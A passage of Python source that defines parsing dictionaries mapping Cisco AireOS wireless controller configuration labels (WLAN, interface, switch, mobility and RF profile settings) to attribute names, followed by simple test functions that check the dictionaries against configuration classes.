'dns_server_ip',\n 'Web Mode': 'web_mode',\n 'Secure Web Mode': 'secure_web_mode',\n 'Secure Web Mode Cipher-Option High': 'secure_web_mode_cipher_option_high',\n 'Secure Web Mode SSL Protocol': 'secure_web_mode_ssl_protocol',\n 'Web CSRF check': 'web_csrf_check',\n 'OCSP': 'ocsp',\n 'OCSP responder URL': 'ocsp_responder_url',\n 'Secure Shell (ssh)': 'secure_shell_ssh',\n 'Secure Shell (ssh) Cipher-Option High': 'secure_shell_ssh_cipher_option_high',\n 'Telnet': 'telnet',\n 'Ethernet Multicast Forwarding': 'ethernet_multicast_forwarding',\n 'Ethernet Broadcast Forwarding': 'ethernet_broadcast_forwarding',\n 'IPv4 AP Multicast/Broadcast Mode': 'ipv4_ap_multicast_broadcast_mode',\n 'IPv6 AP Multicast/Broadcast Mode': 'ipv6_ap_multicast_broadcast_mode',\n 'IGMP snooping': 'igmp_snooping',\n 'IGMP timeout': 'igmp_timeout',\n 'IGMP Query Interval': 'igmp_query_interval',\n 'MLD snooping': 'mld_snooping',\n 'MLD timeout': 'mld_timeout',\n 'MLD query interval': 'mld_query_interval',\n 'User Idle Timeout': 'user_idle_timeout',\n 'ARP Idle Timeout': 'arp_idle_timeout',\n 'Cisco AP Default Master': 'cisco_ap_default_master',\n 'AP Join Priority': 'ap_join_priority',\n 'Mgmt Via Wireless Interface': 'mgmt_via_wireless_interface',\n 'Mgmt Via Dynamic Interface': 'mgmt_via_dynamic_interface',\n 'Bridge MAC filter Config': 'bridge_mac_filter_config',\n 'Bridge Security Mode': 'bridge_security_mode',\n 'Mesh Full Sector DFS': 'mesh_full_sector_dfs',\n 'Mesh Backhaul RRM': 'mesh_backhaul_rrm',\n 'AP Fallback': 'ap_fallback',\n 'Web Auth CMCC Support': 'web_auth_cmcc_support',\n 'Web Auth Redirect Ports': 'web_auth_redirect_ports',\n 'Web Auth Proxy Redirect': 'web_auth_proxy_redirect_',\n 'Web Auth 
Captive-Bypass': 'web_auth_captive_bypass__',\n 'Web Auth Secure Web': 'web_auth_secure_web_',\n 'Web Auth Secure Web Cipher Option': 'web_auth_secure_web_cipher_option_',\n 'Web Auth Secure Web Sslv3': 'web_auth_secure_web_sslv3_',\n 'Web Auth Secure Redirection': 'web_auth_secure_redirection_',\n 'Fast SSID Change': 'fast_ssid_change',\n 'AP Discovery - NAT IP Only': 'ap_discovery_nat_ip_only',\n 'IP/MAC Addr Binding Check': 'ip_mac_addr_binding_check',\n 'Link Local Bridging Status': 'link_local_bridging_status',\n 'CCX-lite status': 'ccx_lite_status',\n 'oeap-600 dual-rlan-ports': 'oeap_600_dual_rlan_ports',\n 'oeap local-network': 'oeap_local_network',\n 'oeap-600 Split Tunneling (Printers)': 'oeap_600_split_tunneling_printers',\n 'WebPortal Online Client': 'webportal_online_client',\n 'WebPortal NTF_LOGOUT Client': 'webportal_ntf_logout_client',\n 'mDNS snooping': 'mdns_snooping',\n 'mDNS Query Interval': 'mdns_query_interval',\n 'Web Color Theme': 'web_color_theme',\n 'Capwap Prefer Mode': 'capwap_prefer_mode',\n 'Network Profile': 'network_profile',\n 'Client ip conflict detection (DHCP)': 'client_ip_conflict_detection_dhcp',\n 'Mesh BH RRM': 'mesh_bh_rrm',\n 'Mesh Aggressive DCA': 'mesh_aggressive_dca',\n 'Mesh Auto RF': 'mesh_auto_rf',\n 'HTTP Profiling Port': 'http_profiling_port',\n 'HTTP-Proxy Ip Address': 'http_proxy_ip_address',\n 'HTTP-Proxy Port': 'http_proxy_port',\n 'WGB Client Forced L2 Roam': 'wgb_client_forced_l2_roam',\n}\n\nssid_config_parsing_dict = {\n 'WLAN Identifier': 'wlan_identifier',\n 'Profile Name': 'profile_name',\n 'Network Name (SSID)': 'network_name_ssid',\n 'Status': 'status',\n 'MAC Filtering': 'mac_filtering',\n 'Broadcast SSID': 'broadcast_ssid',\n 'AAA Policy Override': 'aaa_policy_override',\n 'Network Admission Control': 'network_admission_control',\n 'Client Profiling Status': 'client_profiling_status',\n 'Radius Profiling': 'client_profiling_status_radius_profiling',\n 'DHCP': 'client_profiling_status_radius_profiling_dhcp',\n 'HTTP': 'client_profiling_status_radius_profiling_http',\n 'Local Profiling': 'client_profiling_status_local_profiling',\n 'DHCP1': 'client_profiling_status_local_profiling_dhcp',\n 'HTTP1': 'client_profiling_status_local_profiling_http',\n 'Radius-NAC State': 'radius_nac_state',\n 'SNMP-NAC State': 'snmp_nac_state',\n 'Quarantine VLAN': 'quarantine_vlan',\n 'Maximum Clients Allowed': 'maximum_clients_allowed',\n 'Security Group Tag': 'security_group_tag',\n 'Maximum number of Clients per AP Radio': 'maximum_number_of_clients_per_ap_radio',\n 'ATF Policy': 'atf_policy',\n 'Number of Active Clients': 'number_of_active_clients',\n 'Exclusionlist': 'exclusionlist',\n 'Exclusionlist Timeout': 'exclusionlist_timeout',\n 'Session Timeout': 'session_timeout',\n 'User Idle Timeout': 'user_idle_timeout',\n 'Sleep Client': 'sleep_client',\n 'Sleep Client Timeout': 'sleep_client_timeout',\n 'Web Auth Captive Bypass Mode': 'web_auth_captive_bypass_mode',\n 'User Idle Threshold': 'user_idle_threshold',\n 'NAS-identifier': 'nas_identifier',\n 'CHD per WLAN': 'chd_per_wlan',\n 'Webauth DHCP exclusion': 'webauth_dhcp_exclusion',\n 'Interface': 'interface',\n 'Multicast Interface': 'multicast_interface',\n 'WLAN IPv4 ACL': 'wlan_ipv4_acl',\n 'WLAN IPv6 ACL': 'wlan_ipv6_acl',\n 'WLAN Layer2 ACL': 'wlan_layer2_acl',\n 'WLAN URL ACL': 'wlan_url_acl',\n 'mDNS Status': 'mdns_status',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'DHCP Server': 'dhcp_server',\n 'Central NAT Peer-Peer Blocking': 'central_nat_peer_peer_blocking',\n 'DHCP Address 
Assignment Required': 'dhcp_address_assignment_required',\n 'Static IP client tunneling': 'static_ip_client_tunneling',\n 'Tunnel Profile': 'tunnel_profile',\n 'PMIPv6 Mobility Type': 'pmipv6_mobility_type',\n 'PMIPv6 MAG Profile': 'pmipv6_mobility_type_pmipv6_mag_profile',\n 'PMIPv6 Default Realm': 'pmipv6_mobility_type_pmipv6_default_realm',\n 'PMIPv6 NAI Type': 'pmipv6_mobility_type_pmipv6_nai_type',\n 'PMIPv6 MAG location': 'pmipv6_mobility_type_pmipv6_mag_location',\n 'Quality of Service': 'quality_of_service',\n 'Per-SSID Rate Limits': 'per_ssid_rate_limits',\n 'Average Data Rate': 'average_data_rate',\n 'Average Realtime Data Rate': 'average_realtime_data_rate',\n 'Burst Data Rate': 'burst_data_rate',\n 'Burst Realtime Data Rate': 'burst_realtime_data_rate',\n 'Per-Client Rate Limits': 'per_client_rate_limits',\n 'Average Data Rate1': 'average_data_rate',\n 'Average Realtime Data Rate1': 'average_realtime_data_rate',\n 'Burst Data Rate1': 'burst_data_rate',\n 'Burst Realtime Data Rate1': 'burst_realtime_data_rate',\n 'Scan Defer Priority': 'scan_defer_priority',\n 'Scan Defer Time': 'scan_defer_time',\n 'WMM': 'wmm',\n 'WMM UAPSD Compliant Client Support': 'wmm_uapsd_compliant_client_support',\n 'Media Stream Multicast-direct': 'media_stream_multicast_direct',\n 'CCX - AironetIe Support': 'ccx_aironetie_support',\n 'CCX - Gratuitous ProbeResponse (GPR)': 'ccx_gratuitous_proberesponse_gpr',\n 'CCX - Diagnostics Channel Capability': 'ccx_diagnostics_channel_capability',\n 'Dot11-Phone Mode (7920)': 'dot11_phone_mode_7920',\n 'Wired Protocol': 'wired_protocol',\n 'Passive Client Feature': 'passive_client_feature',\n 'Peer-to-Peer Blocking Action': 'peer_to_peer_blocking_action',\n 'Radio Policy': 'radio_policy',\n 'DTIM period for 802.11a radio': 'dtim_period_for_802_11a_radio',\n 'DTIM period for 802.11b radio': 'dtim_period_for_802_11b_radio',\n 'Radius Servers': 'radius_servers',\n 'Authentication': 'radius_servers_authentication',\n 'Accounting': 'radius_servers_accounting',\n 'Interim Update': 'radius_servers_accounting_interim_update',\n 'Interim Update Interval': 'radius_servers_accounting_interim_update_interval',\n 'Framed IPv6 Acct AVP': 'radius_servers_accounting_framed_ipv6_acct_avp',\n 'Dynamic Interface': 'radius_servers_dynamic_interface',\n 'Dynamic Interface Priority': 'radius_servers_dynamic_interface_priority',\n 'Local EAP Authentication': 'local_eap_authentication',\n 'Radius NAI-Realm': 'radius_nai_realm',\n 'Mu-Mimo': 'mu_mimo',\n 'Security': 'security',\n '802.11 Authentication:': 'security_802_11_authentication',\n 'FT Support': 'security_ft_support',\n 'Static WEP Keys': 'security_static_wep_keys',\n '802.1X': 'security_802_1x',\n 'Wi-Fi Protected Access (WPA/WPA2)': 'security_wi_fi_protected_access_wpa_wpa2',\n 'WPA (SSN IE)': 'security_wi_fi_protected_access_wpa_wpa2_wpa_ssn_ie',\n 'WPA2 (RSN IE)': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie',\n 'TKIP Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_tkip_cipher',\n 'AES Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_aes_cipher',\n 'CCMP256 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_ccmp256_cipher',\n 'GCMP128 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp128_cipher',\n 'GCMP256 Cipher': 'security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp256_cipher',\n 'OSEN IE': 'security_wi_fi_protected_access_wpa_wpa2_osen_ie',\n 'Auth Key Management': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management',\n '802.1x': 
'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_802_1x',\n 'PSK': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_psk',\n 'CCKM': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_cckm',\n 'FT-1X(802.11r)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_1x802_11r',\n 'FT-PSK(802.11r)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_psk802_11r',\n 'PMF-1X(802.11w)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_1x802_11w',\n 'PMF-PSK(802.11w)': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_psk802_11w',\n 'OSEN-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_osen_1x',\n 'SUITEB-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb_1x',\n 'SUITEB192-1X': 'security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb192_1x',\n 'FT Reassociation Timeout': 'security_wi_fi_protected_access_wpa_wpa2_ft_reassociation_timeout',\n 'FT Over-The-DS mode': 'security_wi_fi_protected_access_wpa_wpa2_ft_over_the_ds_mode',\n 'GTK Randomization': 'security_wi_fi_protected_access_wpa_wpa2_gtk_randomization',\n 'SKC Cache Support': 'security_wi_fi_protected_access_wpa_wpa2_skc_cache_support',\n 'CCKM TSF Tolerance': 'security_wi_fi_protected_access_wpa_wpa2_cckm_tsf_tolerance',\n 'Wi-Fi Direct policy configured': 'security_wi_fi_direct_policy_configured',\n 'EAP-Passthrough': 'security_eap_passthrough',\n 'CKIP': 'security_ckip',\n 'Web Based Authentication': 'security_web_based_authentication',\n 'Web Authentication Timeout': 'security_web_authentication_timeout',\n 'Web-Passthrough': 'security_web_passthrough',\n 'Mac-auth-server': 'security_mac_auth_server',\n 'Web-portal-server': 'security_web_portal_server',\n 'qrscan-des-key': 'security_qrscan_des_key',\n 'Conditional Web Redirect': 'security_conditional_web_redirect',\n 'Splash-Page Web Redirect': 'security_splash_page_web_redirect',\n 'Auto Anchor': 'security_auto_anchor',\n 'FlexConnect Local Switching': 'security_flexconnect_local_switching',\n 'FlexConnect Central Association': 'security_flexconnect_central_association',\n 'flexconnect Central Dhcp Flag': 'security_flexconnect_central_dhcp_flag',\n 'flexconnect nat-pat Flag': 'security_flexconnect_nat_pat_flag',\n 'flexconnect Dns Override Flag': 'security_flexconnect_dns_override_flag',\n 'flexconnect PPPoE pass-through': 'security_flexconnect_pppoe_pass_through',\n 'flexconnect local-switching IP-source-guar': 'security_flexconnect_local_switching_ip_source_guar',\n 'FlexConnect Vlan based Central Switching': 'security_flexconnect_vlan_based_central_switching',\n 'FlexConnect Local Authentication': 'security_flexconnect_local_authentication',\n 'FlexConnect Learn IP Address': 'security_flexconnect_learn_ip_address',\n 'Client MFP': 'security_client_mfp',\n 'PMF': 'security_pmf',\n 'PMF Association Comeback Time': 'security_pmf_association_comeback_time',\n 'PMF SA Query RetryTimeout': 'security_pmf_sa_query_retrytimeout',\n 'Tkip MIC Countermeasure Hold-down Timer': 'security_tkip_mic_countermeasure_hold_down_timer',\n 'Eap-params': 'security_eap_params',\n 'AVC Visibilty': 'avc_visibility',\n 'AVC Profile Name': 'avc_profile_name',\n 'Flex Avc Profile Name': 'flex_avc_profile_name',\n 'OpenDns Profile Name': 'opendns_profile_name',\n 'OpenDns Wlan Mode': 'opendns_wlan_mode',\n 'Flow Monitor Name': 'flow_monitor_name',\n 'Split Tunnel Configuration': 'split_tunnel_configuration',\n 'Split Tunnel': 
'split_tunnel_configuration_split_tunnel',\n 'Call Snooping': 'call_snooping',\n 'Roamed Call Re-Anchor Policy': 'roamed_call_re_anchor_policy',\n 'SIP CAC Fail Send-486-Busy Policy': 'sip_cac_fail_send_486_busy_policy',\n 'SIP CAC Fail Send Dis-Association Policy': 'sip_cac_fail_send_dis_association_policy',\n 'KTS based CAC Policy': 'kts_based_cac_policy',\n 'Assisted Roaming Prediction Optimization': 'assisted_roaming_prediction_optimization',\n '802.11k Neighbor List': 'd_802_11k_neighbor_list',\n '802.11k Neighbor List Dual Band': 'd_802_11k_neighbor_list_dual_band',\n '802.11v Directed Multicast Service': 'd_802_11v_directed_multicast_service',\n '802.11v BSS Max Idle Service': 'd_802_11v_bss_max_idle_service',\n '802.11v BSS Transition Service': 'd_802_11v_bss_transition_service',\n '802.11v BSS Transition Disassoc Imminent': 'd_802_11v_bss_transition_disassoc_imminent',\n '802.11v BSS Transition Disassoc Timer': 'd_802_11v_bss_transition_disassoc_timer',\n '802.11v BSS Transition OpRoam Disassoc Timer': 'd_802_11v_bss_transition_oproam_disassoc_timer',\n 'DMS DB is empty': 'dms_db_is_empty',\n 'Band Select': 'band_select',\n 'Load Balancing': 'load_balancing',\n 'Multicast Buffer': 'multicast_buffer',\n 'Universal Ap Admin': 'universal_ap_admin',\n 'Broadcast Tagging': 'broadcast_tagging',\n 'PRP': 'prp',\n 'Mobility Anchor List': 'mobility_anchor_list',\n '802.11u': 'd_802_11u',\n 'MSAP Services': 'msap_services',\n 'Local Policy': 'local_policy',\n 'Priority Policy Name': 'priority__policy_name',\n 'Lync State': 'lync_state',\n 'Audio QoS Policy': 'audio_qos_policy',\n 'Video QoS Policy': 'video_qos_policy',\n 'App-Share QoS Policy': 'app_share_qos_policy',\n 'File Transfer QoS Policy': 'file_transfer_qos_policy',\n 'QoS Fastlane Status': 'qos_fastlane_status',\n 'Selective Reanchoring Status': 'selective_reanchoring_status',\n 'Lobby Admin Access': 'lobby_admin_access',\n 'Fabric status': 'fabric_status',\n 'Vnid Name': 'vnid_name',\n 'Vnid': 'vnid',\n 'Applied SGT Tag': 'applied_sgt_tag',\n 'Peer Ip Address': 'peer_ip_address',\n 'Flex Acl Name': 'flex_acl_name',\n 'Flex Avc Policy Name': 'flex_avc_policy_name',\n 'U3-Interface': 'u3_interface',\n 'U3-Reporting Interval': 'u3_reporting_interval'\n}\n\ninterface_config_parsing_dict = {\n 'Interface Configuration': 'interface_configuration',\n 'Interface Name': 'interface_name',\n 'MAC Address': 'mac_address',\n 'IP Address': 'ip_address',\n 'IP Netmask': 'ip_netmask',\n 'IP Gateway': 'ip_gateway',\n 'External NAT IP State': 'external_nat_ip_state',\n 'External NAT IP Address': 'external_nat_ip_address',\n 'Link Local IPv6 Address': 'link_local_ipv6_address',\n 'STATE': 'state_link_local_ipv6',\n 'Primary IPv6 Address': 'ipv6_address',\n 'STATE1': 'state_ipv6',\n 'Primary IPv6 Gateway': 'ipv6_gateway',\n 'Primary IPv6 Gateway Mac Address': 'ipv6_gateway_mac_address',\n 'IPv6 Address': 'ipv6_address',\n 'IPv6 Gateway': 'ipv6_gateway',\n 'IPv6 Gateway Mac Address': 'ipv6_gateway_mac_address',\n 'STATE2': 'state_ipv6_gateway',\n 'NAS-Identifier': 'nas_identifier',\n 'VLAN': 'vlan',\n 'Quarantine-vlan': 'quarantine_vlan',\n 'Active Physical Port': 'active_physical_port',\n 'Primary Physical Port': 'primary_physical_port',\n 'Backup Physical Port': 'backup_physical_port',\n 'DHCP Proxy Mode': 'dhcp_proxy_mode',\n 'Primary DHCP Server': 'primary_dhcp_server',\n 'Secondary DHCP Server': 'secondary_dhcp_server',\n 'DHCP Option 82': 'dhcp_option_82',\n 'DHCP Option 82 bridge mode insertion': 'dhcp_option_82_bridge_mode_insertion',\n 'IPv4 
ACL': 'ipv4_acl',\n 'URL ACL': 'url_acl',\n 'IPv6 ACL': 'ipv6_acl',\n 'URL ACL1': 'url_acl1',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'AP Manager': 'ap_manager',\n 'Guest Interface': 'guest_interface',\n '3G VLAN': 'd_3g_vlan',\n 'L2 Multicast': 'l2_multicast',\n 'SLAAC': 'slaac',\n 'DHCP Protocol': 'dhcp_protocol',\n 'Speed': 'speed',\n 'Duplex': 'duplex',\n 'Auto Negotiation': 'auto_negotiation',\n 'Link Status': 'link_status',\n 'Virtual DNS Host Name': 'virtual_dns_host_name',\n 'Remote ID format': 'remote_id_format',\n 'Link Select Suboption': 'link_select_suboption',\n 'Relay Src Intf': 'relay_src_intf',\n 'VPN Select Suboption': 'vpn_select_suboption',\n}\n\ninterface_group_parsing_dict = {\n 'Interface Group Name': 'interface_group_name',\n 'Quarantine': 'quarantine',\n 'Number of Wlans using the Interface Group': 'number_of_wlans_using_the_interface_group',\n 'Number of AP Groups using the Interface Group': 'number_of_ap_groups_using_the_interface_group',\n 'Number of Interfaces Contained': 'number_of_interfaces_contained',\n 'mDNS Profile Name': 'mdns_profile_name',\n 'Failure-Detect Mode': 'failure_detect_mode',\n 'Interface Group Description': 'interface_group_description',\n}\n\nswitch_config_parsing_dict = {\n '802.3x Flow Control Mode': 'd_802_3x_flow_control_mode',\n 'FIPS prerequisite features': 'fips_prerequisite_features',\n 'WLANCC prerequisite features': 'wlancc_prerequisite_features',\n 'UCAPL prerequisite features': 'ucapl_prerequisite_features',\n 'Last login information display': 'last_login_information_display',\n 'DTLS WLC MIC': 'dtls_wlc_mic',\n 'secret obfuscation': 'secret_obfuscation',\n 'Strong Password Check Features': 'strong_password_check_features',\n 'case-check': 'strong_password_check_features_case_check',\n 'consecutive-check': 'strong_password_check_features_consecutive_check',\n 'default-check': 'strong_password_check_features_default_check',\n 'username-check': 'strong_password_check_features_username_check',\n 'position-check': 'strong_password_check_features_position_check',\n 'case-digit-check': 'strong_password_check_features_case_digit_check',\n 'Min. Password length': 'strong_password_check_features_min__password_length',\n 'Min. Upper case chars': 'strong_password_check_features_min__upper_case_chars',\n 'Min. Lower case chars': 'strong_password_check_features_min__lower_case_chars',\n 'Min. Digits chars': 'strong_password_check_features_min__digits_chars',\n 'Min. 
Special chars': 'strong_password_check_features_min__special_chars',\n 'Mgmt User': 'mgmt_user',\n 'Password Lifetime [days]': 'mgmt_user_password_lifetime_days',\n 'Password Lockout': 'mgmt_user_password_lockout',\n 'Lockout Attempts': 'mgmt_user_lockout_attempts',\n 'Lockout Timeout [mins]': 'mgmt_user_lockout_timeout_mins',\n 'SNMPv3 User': 'snmpv3_user',\n 'Password Lifetime [days]1': 'snmpv3_user_password_lifetime_days',\n 'Password Lockout1': 'snmpv3_user_password_lockout',\n 'Lockout Attempts1': 'snmpv3_user_lockout_attempts',\n 'Lockout Timeout [mins]1': 'snmpv3_user_lockout_timeout_mins',\n}\n\nmobility_config_parsing_dict = {\n 'Mobility Protocol Port': 'mobility_protocol_port',\n 'Default Mobility Domain': 'default_mobility_domain',\n 'Multicast Mode': 'multicast_mode',\n 'Mobility Domain ID for 802.11r': 'mobility_domain_id_for_802_11r',\n 'Mobility Keepalive Interval': 'mobility_keepalive_interval',\n 'Mobility Keepalive Count': 'mobility_keepalive_count',\n 'Mobility Group Members Configured': 'mobility_group_members_configured',\n 'Mobility Control Message DSCP Value': 'mobility_control_message_dscp_value',\n}\n\nrf_profile_parsing_dict = {\n 'RF Profile name': 'rf_profile_name',\n 'Description': 'description',\n 'AP Group Name': 'ap_group_name',\n 'Radio policy': 'radio_policy',\n '11n-client-only': 'd_11n_client_only',\n 'Transmit Power Threshold v1': 'transmit_power_threshold_v1',\n 'Transmit Power Threshold v2': 'transmit_power_threshold_v2',\n 'Min Transmit Power': 'min_transmit_power',\n 'Max Transmit Power': 'max_transmit_power',\n '802.11b/g Operational Rates': 'd_802_11b_g_operational_rates',\n '802.11b/g 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b/g 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b/g 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b/g 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11g 6M Rate': 'd_802_11b_g_operational_rates_802_11g_6m_rate',\n '802.11g 9M Rate': 'd_802_11b_g_operational_rates_802_11g_9m_rate',\n '802.11g 12M Rate': 'd_802_11b_g_operational_rates_802_11g_12m_rate',\n '802.11g 18M Rate': 'd_802_11b_g_operational_rates_802_11g_18m_rate',\n '802.11g 24M Rate': 'd_802_11b_g_operational_rates_802_11g_24m_rate',\n '802.11g 36M Rate': 'd_802_11b_g_operational_rates_802_11g_36m_rate',\n '802.11g 48M Rate': 'd_802_11b_g_operational_rates_802_11g_48m_rate',\n '802.11g 54M Rate': 'd_802_11b_g_operational_rates_802_11g_54m_rate',\n '802.11a Operational Rates': 'd_802_11a_operational_rates',\n '802.11a 6M Rate': 'd_802_11a_operational_rates_802_11a_6m_rate',\n '802.11a 9M Rate': 'd_802_11a_operational_rates_802_11a_9m_rate',\n '802.11a 12M Rate': 'd_802_11a_operational_rates_802_11a_12m_rate',\n '802.11a 18M Rate': 'd_802_11a_operational_rates_802_11a_18m_rate',\n '802.11a 24M Rate': 'd_802_11a_operational_rates_802_11a_24m_rate',\n '802.11a 36M Rate': 'd_802_11a_operational_rates_802_11a_36m_rate',\n '802.11a 48M Rate': 'd_802_11a_operational_rates_802_11a_48m_rate',\n '802.11a 54M Rate': 'd_802_11a_operational_rates_802_11a_54m_rate',\n 'Trap Threshold': 'trap_threshold',\n 'Clients': 'trap_threshold_clients',\n 'Interference': 'trap_threshold_interference',\n 'Noise': 'trap_threshold_noise',\n 'Utilization': 'trap_threshold_utilization',\n 'Multicast Data Rate': 'multicast_data_rate',\n 'Rx Sop Threshold': 'rx_sop_threshold',\n 'Cca Threshold': 'cca_threshold',\n 'Slot Admin State:': 'slot_admin_state',\n 'Client Aware FRA': 
'client_aware_fra',\n 'State': 'client_aware_fra_state',\n 'Client Select Utilization Threshold': 'client_aware_fra_client_select_utilization_threshold',\n 'Client Reset Utilization Threshold': 'client_aware_fra_client_reset_utilization_threshold',\n 'Band Select': 'band_select',\n 'Probe Response': 'band_select_probe_response',\n 'Cycle Count': 'band_select_cycle_count',\n 'Cycle Threshold': 'band_select_cycle_threshold',\n 'Expire Suppression': 'band_select_expire_suppression',\n 'Expire Dual Band': 'band_select_expire_dual_band',\n 'Client Rssi': 'band_select_client_rssi',\n 'Client Mid Rssi': 'band_select_client_mid_rssi',\n 'Load Balancing': 'load_balancing',\n 'Denial': 'load_balancing_denial',\n 'Window': 'load_balancing_window',\n 'Coverage Data': 'coverage_data',\n 'Data': 'coverage_data_data',\n 'Voice': 'coverage_data_voice',\n 'Minimum Client Level': 'coverage_data_minimum_client_level',\n 'Exception Level': 'coverage_data_exception_level',\n 'DCA Channel List': 'dca_channel_list',\n 'DCA Bandwidth': 'dca_bandwidth',\n 'DCA Foreign AP Contribution': 'dca_foreign_ap_contribution',\n '802.11n MCS Rates': 'd_802_11n_mcs_rates',\n 'MCS-00 Rate': 'd_802_11n_mcs_rates_mcs_00_rate',\n 'MCS-01 Rate': 'd_802_11n_mcs_rates_mcs_01_rate',\n 'MCS-02 Rate': 'd_802_11n_mcs_rates_mcs_02_rate',\n 'MCS-03 Rate': 'd_802_11n_mcs_rates_mcs_03_rate',\n 'MCS-04 Rate': 'd_802_11n_mcs_rates_mcs_04_rate',\n 'MCS-05 Rate': 'd_802_11n_mcs_rates_mcs_05_rate',\n 'MCS-06 Rate': 'd_802_11n_mcs_rates_mcs_06_rate',\n 'MCS-07 Rate': 'd_802_11n_mcs_rates_mcs_07_rate',\n 'MCS-08 Rate': 'd_802_11n_mcs_rates_mcs_08_rate',\n 'MCS-09 Rate': 'd_802_11n_mcs_rates_mcs_09_rate',\n 'MCS-10 Rate': 'd_802_11n_mcs_rates_mcs_10_rate',\n 'MCS-11 Rate': 'd_802_11n_mcs_rates_mcs_11_rate',\n 'MCS-12 Rate': 'd_802_11n_mcs_rates_mcs_12_rate',\n 'MCS-13 Rate': 'd_802_11n_mcs_rates_mcs_13_rate',\n 'MCS-14 Rate': 'd_802_11n_mcs_rates_mcs_14_rate',\n 'MCS-15 Rate': 'd_802_11n_mcs_rates_mcs_15_rate',\n 'MCS-16 Rate': 'd_802_11n_mcs_rates_mcs_16_rate',\n 'MCS-17 Rate': 'd_802_11n_mcs_rates_mcs_17_rate',\n 'MCS-18 Rate': 'd_802_11n_mcs_rates_mcs_18_rate',\n 'MCS-19 Rate': 'd_802_11n_mcs_rates_mcs_19_rate',\n 'MCS-20 Rate': 'd_802_11n_mcs_rates_mcs_20_rate',\n 'MCS-21 Rate': 'd_802_11n_mcs_rates_mcs_21_rate',\n 'MCS-22 Rate': 'd_802_11n_mcs_rates_mcs_22_rate',\n 'MCS-23 Rate': 'd_802_11n_mcs_rates_mcs_23_rate',\n 'MCS-24 Rate': 'd_802_11n_mcs_rates_mcs_24_rate',\n 'MCS-25 Rate': 'd_802_11n_mcs_rates_mcs_25_rate',\n 'MCS-26 Rate': 'd_802_11n_mcs_rates_mcs_26_rate',\n 'MCS-27 Rate': 'd_802_11n_mcs_rates_mcs_27_rate',\n 'MCS-28 Rate': 'd_802_11n_mcs_rates_mcs_28_rate',\n 'MCS-29 Rate': 'd_802_11n_mcs_rates_mcs_29_rate',\n 'MCS-30 Rate': 'd_802_11n_mcs_rates_mcs_30_rate',\n 'MCS-31 Rate': 'd_802_11n_mcs_rates_mcs_31_rate',\n 'Client Network Preference': 'client_network_preference'\n}\n\nmain_parsing_dict_aireos = {\n 'WLAN Configuration': ssid_config_parsing_dict, # Config section start word from list\n 'Probe request filtering..': advanced_config_parsing_dict,\n 'WLC IPv6 Summary': ipv6_config_parsing_dict,\n 'RADIUS Configuration': radius_config_parsing_dict,\n 'Mobility Configuration': mobility_config_parsing_dict,\n 'Total Number of AP Groups': ap_group_parsing_dict,\n '802.11b CleanAir Configuration': cleanair_24g_parsing_dict,\n '802.11a CleanAir Configuration': cleanair_5g_parsing_dict,\n 'Interface Configuration': interface_config_parsing_dict,\n 'Interface Group Configuration': interface_group_parsing_dict,\n 'Network Information': 
network_config_parsing_dict,\n 'Switch Configuration': switch_config_parsing_dict,\n 'AP Airewave Director Configuration': ap_rf_parsing_dict,\n 'AP Config': ap_config_parsing_dict,\n 'DHCP Info': dhcp_server_parsing_dict,\n 'Redundancy Information': redundancy_mode_parsing_dict,\n 'System Information': system_info_parsing_dict,\n '802.11a Configuration': band_5_parsing_dict,\n '802.11b Configuration': band_24_parsing_dict,\n 'Number of RF Profiles': rf_profile_parsing_dict,\n 'Airewave Director Configuration': nearby_aps_parsing_dict, # Special case for Nearby APs info\n}\n\n# TESTING functions section\ndef parsing_dict_checker(dict, class_instance):\n logging.debug('Checking parsing dictionary for object type: ' + str(type(class_instance)))\n # To test parsing dictionary with the class instance\n for key in dict.keys():\n try:\n getattr(class_instance, dict[key])\n except:\n if not 'unique_' in str(key) and not 'end_table_string' in dict[key]: #skip unique_keys and table parsing dicts - needed for dict identification and table parsing\n logging.debug('ERROR: '+ str(type(class_instance)) + ' ' + str(key) + ' ' + str(dict[key]))\n\ndef test_parsing_dicts_aireos():\n parsing_dict_checker(ssid_config_parsing_dict, Ssid_Config())\n parsing_dict_checker(ipv6_config_parsing_dict, Ipv6_Config())\n parsing_dict_checker(advanced_config_parsing_dict, Advanced_Config())\n parsing_dict_checker(radius_config_parsing_dict, Radius_Config())\n parsing_dict_checker(rf_profile_parsing_dict, Rf_Profile())\n parsing_dict_checker(interface_config_parsing_dict, Dynamic_Interface())\n parsing_dict_checker(switch_config_parsing_dict, Switch_Config())\n parsing_dict_checker(network_config_parsing_dict, Network_Config())\n parsing_dict_checker(mobility_config_parsing_dict, Mobility_Config())\n parsing_dict_checker(ap_config_parsing_dict, Ap_Config())\n parsing_dict_checker(dhcp_server_parsing_dict, Dhcp_Server())\n parsing_dict_checker(redundancy_mode_parsing_dict, Redundancy_Config())\n parsing_dict_checker(system_info_parsing_dict, System_Config())\n parsing_dict_checker(band_5_parsing_dict, Band5_Config())\n parsing_dict_checker(band_24_parsing_dict, Band24_Config())\n parsing_dict_checker(cleanair_24g_parsing_dict, Cleanair_24G_Config())\n parsing_dict_checker(cleanair_5g_parsing_dict, 